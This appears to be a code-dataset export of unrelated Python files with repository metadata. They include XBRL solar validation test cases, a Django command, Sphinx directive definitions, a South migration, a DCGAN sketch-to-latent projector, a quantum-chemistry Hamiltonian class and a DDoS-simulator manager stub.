[_ln(), "System", "value is not legal for type solar-types:systemOperationalStatusItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:SystemOperationStatus",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Pro Forma",
"aspects": {
"concept": "solar:TitlePolicyInsuranceStatus",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:titlePolicyInsuranceItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:TitlePolicyInsuranceStatus",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:titlePolicyInsuranceItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:TitlePolicyInsuranceStatus",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "System", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Azimuth Axis Tracking",
"aspects": {
"concept": "solar:TrackerStyle",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "System", "value is not legal for type solar-types:trackerItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:TrackerStyle",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "System", "value is not legal for type solar-types:trackerItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:TrackerStyle",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:ZoningPermitProperty",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "", "value is not legal for type solar-types:zoningPermitPropertyItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:ZoningPermitProperty",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "", "value is not legal for type solar-types:zoningPermitPropertyItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:ZoningPermitProperty",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
]
]
JSON_HEADER = """
{
"documentType": "http://www.xbrl.org/WGWD/YYYY-MM-DD/xbrl-json",
"prefixes": {
"xbrl": "http://www.xbrl.org/WGWD/YYYY-MM-DD/oim",
"solar": "http://xbrl.us/Solar/v1.1/2018-02-09/solar",
"us-gaap": "http://fasb.org/us-gaap/2017-01-31",
"iso4217": "http://www.xbrl.org/2003/iso4217",
"SI": "http://www.xbrl.org/2009/utr"
},
"dtsReferences": [
{
"type": "schema",
"href": "https://raw.githubusercontent.com/xbrlus/solar/v1.2/core/solar_all_2018-03-31_r01.xsd"
}
],
"facts": [
"""
JSON_FOOTER = """
]
}
"""
| 33.69328
| 131
| 0.411878
|
794dbd8fd6bd42e6b27c901deb0aafa877641475
| 584
|
py
|
Python
|
blousebrothers/confs/management/commands/clean_conf_images.py
|
sladinji/blousebrothers
|
461de3ba011c0aaed3f0014136c4497b6890d086
|
[
"MIT"
] | 1
|
2022-01-27T11:58:10.000Z
|
2022-01-27T11:58:10.000Z
|
blousebrothers/confs/management/commands/clean_conf_images.py
|
sladinji/blousebrothers
|
461de3ba011c0aaed3f0014136c4497b6890d086
|
[
"MIT"
] | 5
|
2021-03-19T00:01:54.000Z
|
2022-03-11T23:46:21.000Z
|
blousebrothers/confs/management/commands/clean_conf_images.py
|
sladinji/blousebrothers
|
461de3ba011c0aaed3f0014136c4497b6890d086
|
[
"MIT"
] | null | null | null |
from django.core.management.base import BaseCommand
from blousebrothers.confs.models import Conference
class Command(BaseCommand):
help = 'Check conference images given his conference slug'
def add_arguments(self, parser):
# This is an optional argument
parser.add_argument('slug', nargs='+', type=str)
def handle(self, *args, **options):
print(options["slug"])
obj = Conference.objects.prefetch_related(
"questions__answers",
"questions__images",
).get(slug=options['slug'][0])
obj.check_images()
| 34.352941
| 62
| 0.666096
|
794dbda5ee0dfbbdd30bd7de21cd621fe36055d3
| 16,036
|
py
|
Python
|
v/lib/python2.7/site-packages/sphinx/directives/other.py
|
lucywyman/slides-ii
|
5b00451bfabaa7e17aa32072c65d8ca7f5e3769f
|
[
"Apache-2.0"
] | 1
|
2021-05-13T19:48:03.000Z
|
2021-05-13T19:48:03.000Z
|
sphinx/directives/other.py
|
Rapptz/sphinx
|
9ff6eb55f83893e1bbdd06db87321b0c46f206e0
|
[
"BSD-2-Clause"
] | null | null | null |
sphinx/directives/other.py
|
Rapptz/sphinx
|
9ff6eb55f83893e1bbdd06db87321b0c46f206e0
|
[
"BSD-2-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
sphinx.directives.other
~~~~~~~~~~~~~~~~~~~~~~~
:copyright: Copyright 2007-2015 by the Sphinx team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
from six.moves import range
from docutils import nodes
from docutils.parsers.rst import Directive, directives
from docutils.parsers.rst.directives.admonitions import BaseAdmonition
from docutils.parsers.rst.directives.misc import Class
from docutils.parsers.rst.directives.misc import Include as BaseInclude
from sphinx import addnodes
from sphinx.locale import versionlabels, _
from sphinx.util import url_re, docname_join
from sphinx.util.nodes import explicit_title_re, set_source_info, \
process_index_entry
from sphinx.util.matching import patfilter
def int_or_nothing(argument):
if not argument:
return 999
return int(argument)
class TocTree(Directive):
"""
Directive to notify Sphinx about the hierarchical structure of the docs,
and to include a table-of-contents like tree in the current document.
"""
has_content = True
required_arguments = 0
optional_arguments = 0
final_argument_whitespace = False
option_spec = {
'maxdepth': int,
'name': directives.unchanged,
'caption': directives.unchanged_required,
'glob': directives.flag,
'hidden': directives.flag,
'includehidden': directives.flag,
'numbered': int_or_nothing,
'titlesonly': directives.flag,
}
def run(self):
env = self.state.document.settings.env
suffixes = env.config.source_suffix
glob = 'glob' in self.options
caption = self.options.get('caption')
if caption:
self.options.setdefault('name', nodes.fully_normalize_name(caption))
ret = []
# (title, ref) pairs, where ref may be a document, or an external link,
# and title may be None if the document's title is to be used
entries = []
includefiles = []
all_docnames = env.found_docs.copy()
# don't add the currently visited file in catch-all patterns
all_docnames.remove(env.docname)
for entry in self.content:
if not entry:
continue
if glob and ('*' in entry or '?' in entry or '[' in entry):
patname = docname_join(env.docname, entry)
docnames = sorted(patfilter(all_docnames, patname))
for docname in docnames:
all_docnames.remove(docname) # don't include it again
entries.append((None, docname))
includefiles.append(docname)
if not docnames:
ret.append(self.state.document.reporter.warning(
'toctree glob pattern %r didn\'t match any documents'
% entry, line=self.lineno))
else:
# look for explicit titles ("Some Title <document>")
m = explicit_title_re.match(entry)
if m:
ref = m.group(2)
title = m.group(1)
docname = ref
else:
ref = docname = entry
title = None
# remove suffixes (backwards compatibility)
for suffix in suffixes:
if docname.endswith(suffix):
docname = docname[:-len(suffix)]
break
# absolutize filenames
docname = docname_join(env.docname, docname)
if url_re.match(ref) or ref == 'self':
entries.append((title, ref))
elif docname not in env.found_docs:
ret.append(self.state.document.reporter.warning(
'toctree contains reference to nonexisting '
'document %r' % docname, line=self.lineno))
env.note_reread()
else:
all_docnames.discard(docname)
entries.append((title, docname))
includefiles.append(docname)
subnode = addnodes.toctree()
subnode['parent'] = env.docname
# entries contains all entries (self references, external links etc.)
subnode['entries'] = entries
# includefiles only entries that are documents
subnode['includefiles'] = includefiles
subnode['maxdepth'] = self.options.get('maxdepth', -1)
subnode['caption'] = caption
subnode['glob'] = glob
subnode['hidden'] = 'hidden' in self.options
subnode['includehidden'] = 'includehidden' in self.options
subnode['numbered'] = self.options.get('numbered', 0)
subnode['titlesonly'] = 'titlesonly' in self.options
set_source_info(self, subnode)
wrappernode = nodes.compound(classes=['toctree-wrapper'])
wrappernode.append(subnode)
self.add_name(wrappernode)
ret.append(wrappernode)
return ret
class Author(Directive):
"""
Directive to give the name of the author of the current document
or section. Shown in the output only if the show_authors option is on.
"""
has_content = False
required_arguments = 1
optional_arguments = 0
final_argument_whitespace = True
option_spec = {}
def run(self):
env = self.state.document.settings.env
if not env.config.show_authors:
return []
para = nodes.paragraph(translatable=False)
emph = nodes.emphasis()
para += emph
if self.name == 'sectionauthor':
text = _('Section author: ')
elif self.name == 'moduleauthor':
text = _('Module author: ')
elif self.name == 'codeauthor':
text = _('Code author: ')
else:
text = _('Author: ')
emph += nodes.Text(text, text)
inodes, messages = self.state.inline_text(self.arguments[0],
self.lineno)
emph.extend(inodes)
return [para] + messages
class Index(Directive):
"""
Directive to add entries to the index.
"""
has_content = False
required_arguments = 1
optional_arguments = 0
final_argument_whitespace = True
option_spec = {}
def run(self):
arguments = self.arguments[0].split('\n')
env = self.state.document.settings.env
targetid = 'index-%s' % env.new_serialno('index')
targetnode = nodes.target('', '', ids=[targetid])
self.state.document.note_explicit_target(targetnode)
indexnode = addnodes.index()
indexnode['entries'] = ne = []
indexnode['inline'] = False
set_source_info(self, indexnode)
for entry in arguments:
ne.extend(process_index_entry(entry, targetid))
return [indexnode, targetnode]
class VersionChange(Directive):
"""
Directive to describe a change/addition/deprecation in a specific version.
"""
has_content = True
required_arguments = 1
optional_arguments = 1
final_argument_whitespace = True
option_spec = {}
def run(self):
node = addnodes.versionmodified()
node.document = self.state.document
set_source_info(self, node)
node['type'] = self.name
node['version'] = self.arguments[0]
text = versionlabels[self.name] % self.arguments[0]
if len(self.arguments) == 2:
inodes, messages = self.state.inline_text(self.arguments[1],
self.lineno+1)
para = nodes.paragraph(self.arguments[1], '', *inodes, translatable=False)
set_source_info(self, para)
node.append(para)
else:
messages = []
if self.content:
self.state.nested_parse(self.content, self.content_offset, node)
if len(node):
if isinstance(node[0], nodes.paragraph) and node[0].rawsource:
content = nodes.inline(node[0].rawsource, translatable=True)
content.source = node[0].source
content.line = node[0].line
content += node[0].children
node[0].replace_self(nodes.paragraph('', '', content, translatable=False))
node[0].insert(0, nodes.inline('', '%s: ' % text,
classes=['versionmodified']))
else:
para = nodes.paragraph('', '',
nodes.inline('', '%s.' % text,
classes=['versionmodified']),
translatable=False)
node.append(para)
env = self.state.document.settings.env
# XXX should record node.source as well
env.note_versionchange(node['type'], node['version'], node, node.line)
return [node] + messages
class SeeAlso(BaseAdmonition):
"""
An admonition mentioning things to look at as reference.
"""
node_class = addnodes.seealso
class TabularColumns(Directive):
"""
Directive to give an explicit tabulary column definition to LaTeX.
"""
has_content = False
required_arguments = 1
optional_arguments = 0
final_argument_whitespace = True
option_spec = {}
def run(self):
node = addnodes.tabular_col_spec()
node['spec'] = self.arguments[0]
set_source_info(self, node)
return [node]
class Centered(Directive):
"""
Directive to create a centered line of bold text.
"""
has_content = False
required_arguments = 1
optional_arguments = 0
final_argument_whitespace = True
option_spec = {}
def run(self):
if not self.arguments:
return []
subnode = addnodes.centered()
inodes, messages = self.state.inline_text(self.arguments[0],
self.lineno)
subnode.extend(inodes)
return [subnode] + messages
class Acks(Directive):
"""
Directive for a list of names.
"""
has_content = True
required_arguments = 0
optional_arguments = 0
final_argument_whitespace = False
option_spec = {}
def run(self):
node = addnodes.acks()
node.document = self.state.document
self.state.nested_parse(self.content, self.content_offset, node)
if len(node.children) != 1 or not isinstance(node.children[0],
nodes.bullet_list):
return [self.state.document.reporter.warning(
'.. acks content is not a list', line=self.lineno)]
return [node]
class HList(Directive):
"""
Directive for a list that gets compacted horizontally.
"""
has_content = True
required_arguments = 0
optional_arguments = 0
final_argument_whitespace = False
option_spec = {
'columns': int,
}
def run(self):
ncolumns = self.options.get('columns', 2)
node = nodes.paragraph()
node.document = self.state.document
self.state.nested_parse(self.content, self.content_offset, node)
if len(node.children) != 1 or not isinstance(node.children[0],
nodes.bullet_list):
return [self.state.document.reporter.warning(
'.. hlist content is not a list', line=self.lineno)]
fulllist = node.children[0]
# create a hlist node where the items are distributed
npercol, nmore = divmod(len(fulllist), ncolumns)
index = 0
newnode = addnodes.hlist()
for column in range(ncolumns):
endindex = index + (column < nmore and (npercol+1) or npercol)
col = addnodes.hlistcol()
col += nodes.bullet_list()
col[0] += fulllist.children[index:endindex]
index = endindex
newnode += col
return [newnode]
class Only(Directive):
"""
Directive to only include text if the given tag(s) are enabled.
"""
has_content = True
required_arguments = 1
optional_arguments = 0
final_argument_whitespace = True
option_spec = {}
def run(self):
node = addnodes.only()
node.document = self.state.document
set_source_info(self, node)
node['expr'] = self.arguments[0]
# Same as util.nested_parse_with_titles but try to handle nested
# sections which should be raised higher up the doctree.
surrounding_title_styles = self.state.memo.title_styles
surrounding_section_level = self.state.memo.section_level
self.state.memo.title_styles = []
self.state.memo.section_level = 0
try:
self.state.nested_parse(self.content, self.content_offset,
node, match_titles=1)
title_styles = self.state.memo.title_styles
if (not surrounding_title_styles or
not title_styles or
title_styles[0] not in surrounding_title_styles or
not self.state.parent):
# No nested sections so no special handling needed.
return [node]
# Calculate the depths of the current and nested sections.
current_depth = 0
parent = self.state.parent
while parent:
current_depth += 1
parent = parent.parent
current_depth -= 2
title_style = title_styles[0]
nested_depth = len(surrounding_title_styles)
if title_style in surrounding_title_styles:
nested_depth = surrounding_title_styles.index(title_style)
# Use these depths to determine where the nested sections should
# be placed in the doctree.
n_sects_to_raise = current_depth - nested_depth + 1
parent = self.state.parent
for i in range(n_sects_to_raise):
if parent.parent:
parent = parent.parent
parent.append(node)
return []
finally:
self.state.memo.title_styles = surrounding_title_styles
self.state.memo.section_level = surrounding_section_level
class Include(BaseInclude):
"""
Like the standard "Include" directive, but interprets absolute paths
"correctly", i.e. relative to source directory.
"""
def run(self):
env = self.state.document.settings.env
if self.arguments[0].startswith('<') and \
self.arguments[0].endswith('>'):
# docutils "standard" includes, do not do path processing
return BaseInclude.run(self)
rel_filename, filename = env.relfn2path(self.arguments[0])
self.arguments[0] = filename
return BaseInclude.run(self)
directives.register_directive('toctree', TocTree)
directives.register_directive('sectionauthor', Author)
directives.register_directive('moduleauthor', Author)
directives.register_directive('codeauthor', Author)
directives.register_directive('index', Index)
directives.register_directive('deprecated', VersionChange)
directives.register_directive('versionadded', VersionChange)
directives.register_directive('versionchanged', VersionChange)
directives.register_directive('seealso', SeeAlso)
directives.register_directive('tabularcolumns', TabularColumns)
directives.register_directive('centered', Centered)
directives.register_directive('acks', Acks)
directives.register_directive('hlist', HList)
directives.register_directive('only', Only)
directives.register_directive('include', Include)
# register the standard rst class directive under a different name
# only for backwards compatibility now
directives.register_directive('cssclass', Class)
# new standard name when default-domain with "class" is in effect
directives.register_directive('rst-class', Class)
| 37.12037
| 90
| 0.602582
|
794dbe94a4ebec5f45950698cf43f413e6e94506
| 416
|
py
|
Python
|
phigaro/batch/runner.py
|
Stormrider935/phigaro
|
d2dfb311d069e8edc6261b800f73380687b58798
|
[
"MIT"
] | 1
|
2022-03-09T13:57:06.000Z
|
2022-03-09T13:57:06.000Z
|
phigaro/batch/runner.py
|
Stormrider935/phigaro
|
d2dfb311d069e8edc6261b800f73380687b58798
|
[
"MIT"
] | null | null | null |
phigaro/batch/runner.py
|
Stormrider935/phigaro
|
d2dfb311d069e8edc6261b800f73380687b58798
|
[
"MIT"
] | null | null | null |
from .task.base import AbstractTask
import logging
logger = logging.getLogger(__name__)
def run_tasks_chain(tasks_chain):
"""
:type tasks_chain: list[AbstractTask]
:rtype: str
"""
for task in tasks_chain:
logger.info("Executing {task}. output: {output}".format(
task=task.task_name,
output=task.output()
))
task.run()
return task.output()
| 19.809524
| 64
| 0.620192
|
794dc0d18821e1cdba546e3d23cd9deed75ef312
| 3,312
|
py
|
Python
|
manager/apps/brand/migrations/0009_auto__add_field_brand_brand_logo.py
|
willArrive/brand-manager
|
8fc9b07921b970e88c2e2abd2a69c0e8a27ad212
|
[
"MIT"
] | 3
|
2016-11-17T14:21:25.000Z
|
2019-11-15T16:25:11.000Z
|
manager/apps/brand/migrations/0009_auto__add_field_brand_brand_logo.py
|
willArrive/brand-manager
|
8fc9b07921b970e88c2e2abd2a69c0e8a27ad212
|
[
"MIT"
] | null | null | null |
manager/apps/brand/migrations/0009_auto__add_field_brand_brand_logo.py
|
willArrive/brand-manager
|
8fc9b07921b970e88c2e2abd2a69c0e8a27ad212
|
[
"MIT"
] | 1
|
2016-12-19T23:32:48.000Z
|
2016-12-19T23:32:48.000Z
|
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Brand.brand_logo'
db.add_column(u'brand', 'brand_logo',
self.gf('django.db.models.fields.files.ImageField')(max_length=100, null=True, db_column=u'BRAND_LOGO', blank=True),
keep_default=False)
# Updating brand url field to append default http protocol
db.execute("UPDATE BRAND SET \"BRAND_LOGO\"=CONCAT(CONCAT('brand/logo/', \"BSIN\"), '.jpg');")
def backwards(self, orm):
# Deleting field 'Brand.brand_logo'
db.delete_column(u'brand', u'BRAND_LOGO')
models = {
u'brand.brand': {
'Meta': {'unique_together': "((u'brand_nm', u'owner_cd'),)", 'object_name': 'Brand', 'db_table': "u'brand'"},
'brand_link': ('django.db.models.fields.URLField', [], {'max_length': '255', 'null': 'True', 'db_column': "u'BRAND_LINK'", 'blank': 'True'}),
'brand_logo': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'db_column': "u'BRAND_LOGO'", 'blank': 'True'}),
'brand_nm': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_column': "u'BRAND_NM'"}),
'brand_type_cd': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['brand.BrandType']", 'db_column': "u'BRAND_TYPE_CD'"}),
'bsin': ('django.db.models.fields.CharField', [], {'max_length': '6', 'primary_key': 'True', 'db_column': "u'BSIN'"}),
'comments': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'db_column': "u'COMMENTS'", 'blank': 'True'}),
'flag_delete': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_column': "u'FLAG_DELETE'"}),
'last_modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'db_column': "u'LAST_MODIFIED'", 'blank': 'True'}),
'owner_cd': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['brand.BrandOwner']", 'null': 'True', 'db_column': "u'OWNER_CD'", 'blank': 'True'})
},
u'brand.brandowner': {
'Meta': {'object_name': 'BrandOwner', 'db_table': "u'brand_owner'"},
'owner_cd': ('django.db.models.fields.IntegerField', [], {'primary_key': 'True', 'db_column': "u'OWNER_CD'"}),
'owner_link': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_column': "u'OWNER_LINK'"}),
'owner_nm': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_column': "u'OWNER_NM'"}),
'owner_wiki_en': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_column': "u'OWNER_WIKI_EN'"})
},
u'brand.brandtype': {
'Meta': {'object_name': 'BrandType', 'db_table': "u'brand_type'"},
'brand_type_cd': ('django.db.models.fields.IntegerField', [], {'primary_key': 'True', 'db_column': "u'BRAND_TYPE_CD'"}),
'brand_type_nm': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_column': "u'BRAND_TYPE_NM'"})
}
}
complete_apps = ['brand']
| 63.692308
| 171
| 0.594203
|
794dc26bd4f1464b1d2f8d54f3a8054d514960ef
| 4,278
|
py
|
Python
|
Project2Manifold.py
|
thu-fit/DCGAN-anime
|
da549bd45a6ca3c4c5a8894945d3242c59f823a0
|
[
"MIT"
] | null | null | null |
Project2Manifold.py
|
thu-fit/DCGAN-anime
|
da549bd45a6ca3c4c5a8894945d3242c59f823a0
|
[
"MIT"
] | null | null | null |
Project2Manifold.py
|
thu-fit/DCGAN-anime
|
da549bd45a6ca3c4c5a8894945d3242c59f823a0
|
[
"MIT"
] | null | null | null |
from model import DCGAN
import tensorflow as tf
from utils import *
from ops import *
import numpy as np
from utils_extended import *
import os
class Project2Manifold:
def __init__(self, dcgan, FLAGS):
self.dcgan = dcgan
self.FLAGS = FLAGS
self.output_height = FLAGS.output_height
self.output_width = FLAGS.output_width
self.f_dim = 64 # first layer feature dimension
self.z_dim = dcgan.z_dim
self.batch_size = dcgan.batch_size
self.sess = dcgan.sess
self.p_bn1 = batch_norm(name='p_bn1')
self.p_bn2 = batch_norm(name='p_bn2')
self.p_bn3 = batch_norm(name='p_bn3')
#log folder
self.logdir = "./projector_log"
if not os.path.isdir(self.logdir):
os.mkdir(self.logdir)
def build_model(self):
# z --> x --> sketch, the pair(sketch, z) which will be used to train projector
self.z = tf.placeholder(tf.float32, [self.batch_size, self.z_dim], name='z')
self.sketch = tf.placeholder(tf.float32, [self.batch_size, self.output_height, self.output_width, 1], name='sketch')
self.x_generated = self.dcgan.sampler(self.z)
# define projector sketch --> z
self.z_project = self.sketch2z(self.sketch)
# loss of projector
self.loss = tf.reduce_mean(tf.squared_difference(self.z, self.z_project))
# projected x = G(z), used to compare with x_generated
self.x_project = self.dcgan.sampler(self.z_project)
# variables to train
t_vars = tf.trainable_variables()
self.p_vars = [var for var in t_vars if 'p_' in var.name]
# define summaries, which can be shown by tensorboard
loss_sum = scalar_summary("p_loss", self.loss)
z_sum = histogram_summary("z", self.z)
z_project_sum = histogram_summary("z_project", self.z_project)
x_generated_sum = image_summary("x_generated", self.x_generated)
sketch_sum = image_summary("sketch", self.sketch)
x_project_sum = image_summary("x_project", self.x_project)
self.sum_merged = merge_summary([loss_sum, z_sum, z_project_sum,
x_generated_sum, sketch_sum, x_project_sum])
self.writer = SummaryWriter(self.logdir, self.sess.graph)
def train(self, iteration):
# optimizer
self.optim = tf.train.AdamOptimizer(self.FLAGS.learning_rate, beta1=self.FLAGS.beta1) \
.minimize(self.loss, var_list = self.p_vars)
# initialize
try:
tf.global_variables_initializer().run()
except:
tf.initialize_all_variables().run()
# load model
could_load, checkpoint_counter = self.dcgan.load(self.dcgan.checkpoint_dir)
if could_load:
counter = checkpoint_counter
print(" [*] Load SUCCESS")
else:
print(" [!] Load failed...")
# gao_shi_qing
for it in xrange(iteration):
# generate a pair of batch samples (sketch, z)
batch_z = np.random.uniform(-1, 1, [self.batch_size, self.z_dim]) \
.astype(np.float32)
batch_x, = self.sess.run([self.x_generated], feed_dict = {self.z: batch_z})
# print(self.sess.run([tf.shape(self.x_generated)]))
# print(np.shape(batch_x))
batch_sketch = image2edge(batch_x).astype(np.float32)
# train the projector using the generated pair (sketch, z)
_, loss_, _, summary_str = self.sess.run([self.optim, self.loss, self.x_project, self.sum_merged],
feed_dict = {
self.sketch: batch_sketch,
self.z: batch_z
})
self.writer.add_summary(summary_str, it)
print("iteration: {}, loss: {} ".format(it, loss_))
def sketch2z(self, sketch, batch_size=None, reuse=False):
'''construct graph which maps a sketch to z
'''
if batch_size is None:
batch_size = self.batch_size
with tf.variable_scope("sketch2z") as scope:
if reuse:
scope.reuse_variables()
h0 = lrelu(conv2d(sketch, self.f_dim, name='p_h0_conv'))
h1 = lrelu(self.p_bn1(conv2d(h0, self.f_dim*2, name='p_h1_conv')))
h2 = lrelu(self.p_bn2(conv2d(h1, self.f_dim*4, name='p_h2_conv')))
h3 = lrelu(self.p_bn3(conv2d(h2, self.f_dim*8, name='p_h3_conv')))
z = linear(tf.reshape(h3, [batch_size, -1]), self.z_dim, 'p_h3_lin')
return tf.nn.tanh(z)
| 33.952381
| 120
| 0.654278
|
794dc459f5bb403856c9a652bb2463eee15f6644
| 1,621
|
py
|
Python
|
qiskit_nature/drivers/watson_hamiltonian.py
|
divshacker/qiskit-nature
|
08f6dcec5e4ac8c08f5b84e764ee78cc3d12facb
|
[
"Apache-2.0"
] | null | null | null |
qiskit_nature/drivers/watson_hamiltonian.py
|
divshacker/qiskit-nature
|
08f6dcec5e4ac8c08f5b84e764ee78cc3d12facb
|
[
"Apache-2.0"
] | null | null | null |
qiskit_nature/drivers/watson_hamiltonian.py
|
divshacker/qiskit-nature
|
08f6dcec5e4ac8c08f5b84e764ee78cc3d12facb
|
[
"Apache-2.0"
] | null | null | null |
# This code is part of Qiskit.
#
# (C) Copyright IBM 2020, 2021.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
""" Watson Hamiltonian """
from typing import Union, List
import warnings
class WatsonHamiltonian:
"""**DEPRECATED**
Watson Hamiltonian class containing the results of a driver's anharmonic calculation
"""
def __init__(self, data: List[List[Union[int, float]]], num_modes: int):
"""
Args:
data: Hamiltonian matrix elements
num_modes: number of modes
"""
warnings.warn(
"This WatsonHamiltonian is deprecated as of 0.2.0, "
"and will be removed no earlier than 3 months after the release. "
"You should use the qiskit_nature.drivers.second_quantization "
"WatsonHamiltonian as a direct replacement instead.",
DeprecationWarning,
stacklevel=2,
)
self._data = data
self._num_modes = num_modes
@property
def data(self) -> List[List[Union[int, float]]]:
"""Returns the matrix elements of the Hamiltonian"""
return self._data
@property
def num_modes(self) -> int:
"""Returns the number of modes"""
return self._num_modes
| 31.784314
| 88
| 0.657002
|
794dc4eb1e3d23a5e3c4cfe480a62ddd7639579b
| 121
|
py
|
Python
|
test_suite/microbenchmarks/bench11/test.py
|
joncatanio/cannoli
|
410f6bea362bf9e33eecc0e01fb080dadd14ef23
|
[
"MIT"
] | 755
|
2017-12-09T05:34:43.000Z
|
2022-03-26T09:15:56.000Z
|
test_suite/microbenchmarks/bench11/test.py
|
joncatanio/cannoli
|
410f6bea362bf9e33eecc0e01fb080dadd14ef23
|
[
"MIT"
] | 8
|
2017-12-12T01:03:18.000Z
|
2020-06-29T01:41:03.000Z
|
test_suite/microbenchmarks/bench11/test.py
|
joncatanio/cannoli
|
410f6bea362bf9e33eecc0e01fb080dadd14ef23
|
[
"MIT"
] | 23
|
2018-05-17T17:48:23.000Z
|
2022-03-26T09:15:57.000Z
|
lst = []
i = 0
while i < 100:
i += 1
lst.append(i)
i = 0
while i < 1000000:
i += 1
reversed_lst = lst[::-1]
| 11
| 27
| 0.487603
|
794dc69b278c1ea0bc6f99f1bd1710158343f430
| 730
|
py
|
Python
|
lib_ddos_simulator/managers/protag/isolator_2i_kf.py
|
jfuruness/lib_ddos_simulator
|
2d860fd3f35f4c25262f5269251eed89975f95e8
|
[
"BSD-4-Clause"
] | 1
|
2020-04-01T22:42:36.000Z
|
2020-04-01T22:42:36.000Z
|
lib_ddos_simulator/managers/protag/isolator_2i_kf.py
|
jfuruness/lib_ddos_simulator
|
2d860fd3f35f4c25262f5269251eed89975f95e8
|
[
"BSD-4-Clause"
] | null | null | null |
lib_ddos_simulator/managers/protag/isolator_2i_kf.py
|
jfuruness/lib_ddos_simulator
|
2d860fd3f35f4c25262f5269251eed89975f95e8
|
[
"BSD-4-Clause"
] | 1
|
2020-02-16T17:55:46.000Z
|
2020-02-16T17:55:46.000Z
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""This module contains the class Protag_Manager, which manages a cloud
This manager inherits Manager class and uses Protag shuffling algorithm
"""
__Lisence__ = "BSD"
__maintainer__ = "Justin Furuness"
__email__ = "jfuruness@gmail.com, agorbenko97@gmail.com"
__status__ = "Development"
from .isolator_2i_1f import Isolator_2i_1f
from ...simulation_objects import User_Status
from ...utils import split_list
class Isolator_2i_kf(Isolator_2i_1f):
"""Simulates a manager for a DDOS attack
This Manager class uses a protag shuffling algorithm
this manager class also merges buckets in a smart way"""
__slots__ = []
runnable = True
conservative = True
| 23.548387
| 71
| 0.747945
|
794dc76a76b28232977f2db994766a3d5589085d
| 104
|
py
|
Python
|
app/forms/user/__init__.py
|
jinxiu89/uwget
|
1827f882a091a68a77d00086968f695991e5278a
|
[
"MIT"
] | null | null | null |
app/forms/user/__init__.py
|
jinxiu89/uwget
|
1827f882a091a68a77d00086968f695991e5278a
|
[
"MIT"
] | 1
|
2021-06-02T00:29:20.000Z
|
2021-06-02T00:29:20.000Z
|
app/forms/user/__init__.py
|
jinxiu89/uwget
|
1827f882a091a68a77d00086968f695991e5278a
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# _*_ coding:utf-8_*_
# author:jinxiu89@163.com
# create by thomas on 2019/6/23.
| 17.333333
| 32
| 0.692308
|
794dc79171a2ce2367be2ef9b7e3b8cfe9f83587
| 4,812
|
py
|
Python
|
app/main/views.py
|
neverland0/quickForm
|
431635326a1d8d66d4a9a7d47cdaa1d83ab0eec4
|
[
"MIT"
] | null | null | null |
app/main/views.py
|
neverland0/quickForm
|
431635326a1d8d66d4a9a7d47cdaa1d83ab0eec4
|
[
"MIT"
] | null | null | null |
app/main/views.py
|
neverland0/quickForm
|
431635326a1d8d66d4a9a7d47cdaa1d83ab0eec4
|
[
"MIT"
] | null | null | null |
